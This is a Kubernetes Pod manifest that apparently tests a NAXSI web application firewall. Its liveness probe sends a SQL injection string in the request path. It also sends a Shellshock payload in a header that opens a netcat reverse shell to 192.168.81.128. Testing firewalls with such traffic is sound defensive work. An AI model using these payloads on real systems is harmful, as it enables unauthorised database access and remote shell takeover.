radarhack-pod-probes.yaml
apiVersion: v1
kind: Pod
metadata:
   name: radarhack-pod3
   labels:
      pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.radarhack.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 192.168.81.128 443
      initialDelaySeconds: 3
      periodSeconds: 3
